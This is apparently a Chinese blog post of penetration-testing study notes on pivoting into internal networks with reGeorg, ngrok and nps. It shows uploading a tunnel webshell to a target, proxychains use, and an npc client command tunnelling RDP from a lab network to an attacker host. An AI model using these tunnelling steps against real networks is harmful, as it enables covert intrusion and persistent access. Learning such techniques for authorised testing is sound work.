内网端口转发(二)

  1. reGeorg
  2. ngrok
  3. nps


本文属于学习笔记,内容来源于

https://mp.weixin.qq.com/s/zwaeUD7-QMTYgvymgw2EVQ

reGeorg

Github参考:https://github.com/sensepost/reGeorg

php不可用,有大佬自改过后可以用。但是下载地址没了

Linux下的用法

根据目标对应的脚本,将对应的脚本上传到目标,jsp就是tunnel.jsp

reGeorg -u [url] -p [转发到本地的端口]

配置proxychains,添加本机IP和转发的端口

vim /etc/proxychains.conf

然后使用工具的时候如下方式执行:

proxychains [工具名]
例如:proxychains curl http://192.168.1.1

可以看到转发的流量

Windows的用法

链接:https://bbs.ichunqiu.com/thread-12514-1-1.html

ngrok

虽然内网穿透工具众多,但我还是爱好国外免费的ngrok

根据对应的系统下载对应的ngrok,然后登录获取key,将ngrok进行注册

将本地的4444端口映射到外网

这里有个不好的消息:国外的ngrok貌似被墙了

当然这里也可以用国内的ngrok就是有点繁琐

http://www.ngrok.cc/

缺点:

  • 需要fq
  • 填写IP会变动,所以得填写域名
  • 穿透RDP会卡

nps

仓库地址:https://github.com/cnlh/nps/releases

启动nps,执行./nps,注意不要和系统服务冲突

访问http://IP:8080可看到管理界面,默认账户是admin/123

登录进去后如下:

新增一个客户端

可以看到客户端多了一个

查看客户端连接命令

根据目标系统下载对应的client,填写basic账号密码:

然后执行

./npc -server=192.168.241.152:8024 -vkey=test -type=tcp

新建TCP隧道

netstat -ant | grep 4444

mstsc连接

在仪表盘可以看到流量的产生

网络图是这样

A attack 192.168.241.152
B windows 7 192.168.1.104
C widnows server 2008 192.168.241.155


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:内网端口转发(二)

本文作者:九世

发布时间:2019-09-22, 22:29:35

最后更新:2019-09-22, 22:37:34

原始链接:http://422926799.github.io/posts/6ee35fc8.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录